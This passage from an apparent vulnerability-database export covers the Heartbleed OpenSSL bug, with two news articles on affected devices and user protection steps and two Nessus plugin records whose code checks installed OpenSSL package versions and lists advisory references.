visit websites are vulnerable to the Heartbleed bug, will be wrong. Despite 40-60 billion active Smartphone applications may be sharing some of those same servers or connect to their own group of servers that may also be compromised.\n\n \n\n\n**ANDROID**\n\nGoogle wrote in an update on its Online Security [blog](<https://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html>) on Wednesday, emphasizing that Android was not vulnerable to the Heartbleed bug, except for a very specific version and can you guess that so called specific version??\n\n \n\n\n[Android](<https://thehackernews.com/search/label/Android>) 4.1.1 Jelly Bean, the one which makes up the majority of Android devices around the world, and which relies on the vulnerable version of OpenSSL.\n\n \n\n\nGoogle didn\u2019t reveal the actual figure that are vulnerable to the bug, but according to the latest [dashboard ](<https://developer.android.com/about/dashboards/index.html?utm_source=ausdroid.net>)released by Google, it is estimated that around 34.4% of the Android devices in use today are running the Android 4.1.x version. \n\n \n\n\nEven last September Google announced that it had activated one billion devices. This means that the minimal number is likely to be in the millions. So, one can imagine how many Smartphones and tablets were at risk.\n\n \n\n\nWell, Google has released the patches for Android 4.1.1 which is being distributed among the Android partners.\n\n \n\n\n**APPLE**\n\n[Apple](<https://thehackernews.com/search/label/Apple>) users can be relaxed knowing that their devices running iOS and OS X are not affected by the most critical security flaw, Heartbleed.\n\n \n\n\n\"_Apple takes security very seriously. IOS and OS X never incorporated the vulnerable software and key web-based services were not affected_,\" Apple told [Re/code](<http://recode.net/2014/04/10/apple-says-ios-osx-and-key-web-services-not-affected-by-heartbleed-security-flaw/>).\n\n \n\n\nInstead using OpenSSL, Apple relies on different SSL/TLS libraries called Secure Transport, which was hit by its own very serious bug in February outcropping the possibility for [man-in-the-middle (MitM) attacks](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>) \u2014 though it wasn't as dangerous as the recent OpenSSL Heartbleed security Flaw.\n\n \n\n\nBut still Apple users were not exempted completely, as the users using BBM for private messages on iOS might have been vulnerable to this flaw.\n\n \n\n\n**BLACKBERRY**\n\nBlackberry [confirmed](<http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalId=KB35882&sliceId=1&cmd=displayKC&docType=kc&noCount=true&ViewedDocsListHelper=com.kanisa.apps.common.BaseViewedDocsListHelperImpl>) that some of its products, including Secure Work Space for iOS and Android, and BlackBerry Link for Windows and Mac OS and even BBM for iOS and Android were vulnerable to the Heartbleed security flaw. The figure of affected users is not least, as about 80 million people use BBM service.\n\n \n\n\nThey have also assured that BlackBerry Smartphones and tablets, BlackBerry Enterprise Server 5, BlackBerry Enterprise Service 10, and the BlackBerry Infrastructure are not affected by the flaw and are fully protected.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "cvss3": {}, "published": "2014-04-13T08:19:00", "type": "thn", "title": "Billions of Smartphone Users affected by Heartbleed Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-13T19:32:50", "id": "THN:4868B616BCBA555DA2446F6F0EA837B0", "href": "https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "description": "[](<https://4.bp.blogspot.com/-iF_r9MR_7MM/U0boktQvR9I/AAAAAAAAbI4/p8kgxWrFu4c/s1600/protect-from-Heartbleed-bug.jpg>)\n\nMillions of websites, users' passwords, credit card numbers and other personal information may be at risk as a result of the [**Heartbleed security flaw**](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), a vulnerability in widely used cryptographic library '**_OpenSSL_**'. [[READ DETAILS HERE](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)] \n \nNetcraft [survey](<http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html>) says that about half a million widely trusted active websites on the internet are vulnerable to the heartbleed bug, which means the information transmitting through hundreds of thousands of websites could be vulnerable, despite the protection offered by encryption techniques.\n\n \n\n\nAccording to Netcraft, \u201c_the heartbeat extension was enabled on 17.5% of SSL sites, accounting for around half a million certificates issued by trusted certificate authorities. These certificates are consequently vulnerable to being spoofed (through private key disclosure), allowing an attacker to impersonate the affected websites without raising any browser warnings._\u201d\n\n \n\n\nAmong the trusted names running OpenSSL is Yahoo!, which has been affected by this critical flaw. Yes, Yahoo Inc., which boasts more than 800 million users worldwide, is among the Internet services that could be potentially hurt by Heartbleed.\n\n \n\n\nThe bug leaks the below given information, although Yahoo! has since patched its systems.\n\n[](<https://1.bp.blogspot.com/-C1vFJyYZ5Ig/U0bIgPoTloI/AAAAAAAAbIo/EjLY1KOHb9w/s728/yahoo-password-cracking.png>)\n\nThe Popular sites which exhibit support for the TLS heartbeat extension also include Twitter, Facebook, GitHub, Bank of America, DropBox are not currently vulnerable, but it is unclear that they were vulnerable few days ago.\n\n \n\n\nIncluding Yahoo!, Flickr, Tumbler, Google, OKCupid and even the anonymous search engine DuckDuckGo was vulnerable, which has now been fixed.\n\n \n\n\nYahoo Inc. said that it has \"s_uccessfully made appropriate corrections_\" to the main Yahoo properties, including Yahoo Homepage, Search, Mail, Finance, Sports, Food, Tech, Flickr and Tumblr.\n\n \n\n\nYou can see the Heartbleed mass-test when performed around 8th April from [here](<https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt>). In the list, the websites shown vulnerable may not be vulnerable right now.\n\n \n**HOW TO CHECK IF YOUR FAVORITE WEBSITES ARE VULNERABLE**\n\n1.) First of all check if the sites you use every day on an individual basis are vulnerable to Heartbleed bug or not using [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>), and if you're given a red flag, avoid the site for now. \n \n2.) LastPass also created a [Web app](<https://lastpass.com/heartbleed/>) that will tell you what kind of encryption a site uses, and when the encryption was last updated. \n \n3.) Provensec also created a scanner at <http://provensec.com/heartbleed/> \n \n4.) GlobalSign SSL Configuration [Checker](<https://sslcheck.globalsign.com/>). \n \n5.) The easiest way to keep you safe is to use a new add-on to the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher, Jamie Hoyle.\n\n \n\n\n**HOW TO PROTECT YOURSELF FROM HEARTBLEED** \nIf the site you use is not affected by the vulnerability, its good idea that you change your password immediately, assuming that it was vulnerable before, just to make sure that you are now safe. But changing the password before the bug is fixed could compromise your new password as well. \n \nYou are advised to don't reuse the same passwords on different websites and try to use a separate password for each website. \n \nIf you are using a public Wi-Fi at MacDonald or any other public places, then you should limit your Internet behavior and avoid sign in into websites that are especially sensitive. \n \nOpenSSL version 1.0.1 through 1.0.1f and 1.0.2-beta1 are Vulnerable and flaw is fixed in [OpenSSL 1.0.1g](<https://www.openssl.org/source/>). If you haven't yet, please update your system that use OpenSSL for TLS encrypted communications.\n\n \n\n\nAnd last but not the least; keep an eye on every financial transaction, and it is good practice to use two-factor authentication, which means with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone, before getting into certain sites. \n \nStay Secure! Stay Tuned. \n \n**Related Important Articles:** \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "cvss3": {}, "published": "2014-04-10T07:58:00", "type": "thn", "title": "How to Protect yourself from the 'Heartbleed' Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-12T09:00:15", "id": "THN:3E9A13AAEA7FDC38D7BD8A148F19663D", "href": "https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2022-05-21T15:03:29", "description": "pull in upstream patch for CVE-2014-0160", "cvss3": {"score": null, "vector": null}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Fedora 20 : openssl-1.0.1e-37.fc20.1 (2014-4879)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssl", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-4879.NASL", "href": "https://www.tenable.com/plugins/nessus/73429", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4879.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73429);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4879\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Fedora 20 : openssl-1.0.1e-37.fc20.1 (2014-4879)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"pull in upstream patch for CVE-2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085065\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78ae7e34\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected openssl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"openssl-1.0.1e-37.fc20.1\")) flag++;\n\n\nif (flag)\n{\n report = rpm_report_get();\n\n if(!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1\");\n \n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2022-06-15T16:53:40", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. \n\nThis plugin only works with Tenable.ot. Please visit https://www.tenable.com/products/tenable-ot for more information.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2022-02-07T00:00:00", "type": "nessus", "title": "Siemens (CVE-2014-0160)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-02-07T00:00:00", "cpe": ["cpe:/o:siemens:simatic_s7-1500_firmware:1.5", "cpe:/o:siemens:simatic_s7-1500t_firmware:1.5"], "id": "TENABLE_OT_SIEMENS_CVE-2014-0160.NASL", "href": "https://www.tenable.com/plugins/ot/500424", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(500424);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/07\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0376\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0396\");\n script_xref(name:\"SECUNIA\", value:\"57347\");\n script_xref(name:\"HP\", value:\"HPSBMU02995\");\n script_xref(name:\"DSA\", value:\"DSA-2896\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0377\");\n script_xref(name:\"FEDORA\", value:\"FEDORA-2014-4879\");\n script_xref(name:\"RHSA\", value:\"RHSA-2014:0378\");\n script_xref(name:\"SECUNIA\", value:\"57483\");\n script_xref(name:\"FEDORA\", value:\"FEDORA-2014-4910\");\n script_xref(name:\"SuSE\", value:\"openSUSE-SU-2014:0492\");\n script_xref(name:\"SECUNIA\", value:\"57721\");\n script_xref(name:\"SuSE\", value:\"SUSE-SA:2014:002\");\n script_xref(name:\"CERT\", value:\"TA14-098A\");\n script_xref(name:\"SECUNIA\", value:\"57966\");\n script_xref(name:\"SECUNIA\", value:\"57968\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"SECUNIA\", value:\"57836\");\n script_xref(name:\"HP\", value:\"HPSBMU03009\");\n script_xref(name:\"HP\", value:\"HPSBMU03022\");\n script_xref(name:\"HP\", value:\"HPSBMU03024\");\n script_xref(name:\"HP\", value:\"HPSBST03000\");\n script_xref(name:\"HP\", value:\"HPSBHF03136\");\n script_xref(name:\"HP\", value:\"SSRT101846\");\n script_xref(name:\"HP\", value:\"HPSBMU03017\");\n script_xref(name:\"HP\", value:\"HPSBMU02994\");\n script_xref(name:\"HP\", value:\"HPSBST03001\");\n script_xref(name:\"HP\", value:\"HPSBST03004\");\n script_xref(name:\"HP\", value:\"HPSBST03016\");\n script_xref(name:\"HP\", value:\"HPSBMU03032\");\n script_xref(name:\"HP\", value:\"HPSBGN03011\");\n script_xref(name:\"HP\", value:\"HPSBMU03013\");\n script_xref(name:\"HP\", value:\"HPSBMU03023\");\n script_xref(name:\"HP\", value:\"HPSBMU03029\");\n script_xref(name:\"HP\", value:\"HPSBGN03008\");\n script_xref(name:\"HP\", value:\"HPSBPI03031\");\n script_xref(name:\"HP\", value:\"HPSBHF03021\");\n script_xref(name:\"HP\", value:\"HPSBMU03037\");\n script_xref(name:\"HP\", value:\"HPSBMU03012\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"HPSBMU03025\");\n script_xref(name:\"HP\", value:\"HPSBST03027\");\n script_xref(name:\"HP\", value:\"HPSBMU02999\");\n script_xref(name:\"HP\", value:\"HPSBMU03040\");\n script_xref(name:\"HP\", value:\"HPSBST03015\");\n script_xref(name:\"HP\", value:\"HPSBMU02997\");\n script_xref(name:\"HP\", value:\"HPSBGN03010\");\n script_xref(name:\"HP\", value:\"HPSBMU03028\");\n script_xref(name:\"HP\", value:\"HPSBMU03044\");\n script_xref(name:\"HP\", value:\"HPSBMU03033\");\n script_xref(name:\"HP\", value:\"HPSBPI03014\");\n script_xref(name:\"HP\", value:\"HPSBMU02998\");\n script_xref(name:\"HP\", value:\"HPSBMU03019\");\n script_xref(name:\"HP\", value:\"HPSBMU03030\");\n script_xref(name:\"HP\", value:\"HPSBMU03018\");\n script_xref(name:\"HP\", value:\"HPSBMU03062\");\n script_xref(name:\"SECUNIA\", value:\"59347\");\n script_xref(name:\"SECUNIA\", value:\"59243\");\n script_xref(name:\"SECUNIA\", value:\"59139\");\n script_xref(name:\"FEDORA\", value:\"FEDORA-2014-9308\");\n script_xref(name:\"USN\", value:\"USN-2165-1\");\n script_xref(name:\"SuSE\", value:\"openSUSE-SU-2014:0560\");\n\n script_name(english:\"Siemens (CVE-2014-0160)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OT asset is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension\npackets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that\ntrigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the\nHeartbleed bug. \n\nThis plugin only works with Tenable.ot. Please visit https://www.tenable.com/products/tenable-ot for\nmore information.\");\n # http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=96db9023b881d7cd9f379b0c154650d6c108e9a3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f4e30e1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1084875\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openssl.org/news/secadv_20140407.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030078\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/109\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/190\");\n # https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb05d3e3\");\n # http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3053dc8b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0376.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0396.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030082\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57347\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139722163017074&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030077\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21670161\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.debian.org/security/2014/dsa-2896\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030080\");\n # http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93cd0f79\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030074\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/90\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030081\");\n # http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f211d28\");\n script_set_attribute(attribute:\"see_also\", value:\"http://rhn.redhat.com/errata/RHSA-2014-0378.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/91\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57483\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.splunk.com/view/SP-CAAAMB3\");\n # http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d79cd294\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030079\");\n # http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8e93b1c3\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57721\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.blackberry.com/btsc/KB35882\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securitytracker.com/id/1030026\");\n # http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22274a45\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/bid/66690\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.us-cert.gov/ncas/alerts/TA14-098A\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.torproject.org/blog/openssl-bug-cve-2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57966\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.f-secure.com/en/web/labs_global/fsc-2014-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Apr/173\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57968\");\n script_set_attribute(attribute:\"see_also\", value:\"https://code.google.com/p/mod-spdy/issues/detail?id=85\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.exploit-db.com/exploits/32745\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.kb.cert.org/vuls/id/720951\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cert.fi/en/reports/2014/vulnerability788210.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.exploit-db.com/exploits/32764\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/57836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://gist.github.com/chapmajs/10473815\");\n # http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8376305c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://cogentdatahub.com/ReleaseNotes.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905458328378&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139869891830365&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139889113431619&w=2\");\n # http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddfe97e6\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.kerio.com/support/kerio-control/release-history\");\n # http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dcfb51d7\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0165.html\");\n # https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?337f7a06\");\n # http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7de2f8eb\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=isg400001843\");\n script_set_attribute(attribute:\"see_also\", value:\"https://filezilla-project.org/versions.php?type=server\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=isg400001841\");\n # https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dcdcb279\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=141287864628122&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Dec/23\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0012.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=142660345230545&w=2\");\n # http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c46d757d\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.mandriva.com/security/advisories?name=MDVSA-2015:062\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139817727317190&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139757726426985&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139758572430452&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905653828999&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139842151128341&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905405728262&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139833395230364&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139824993005633&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139843768401936&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905202427693&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139774054614965&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139889295732144&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139835815211508&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=140724451518351&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139808058921905&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139836085512508&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139869720529462&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905868529690&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139765756720506&w=2\");\n script_set_attribute(attribute:\"see_also\", 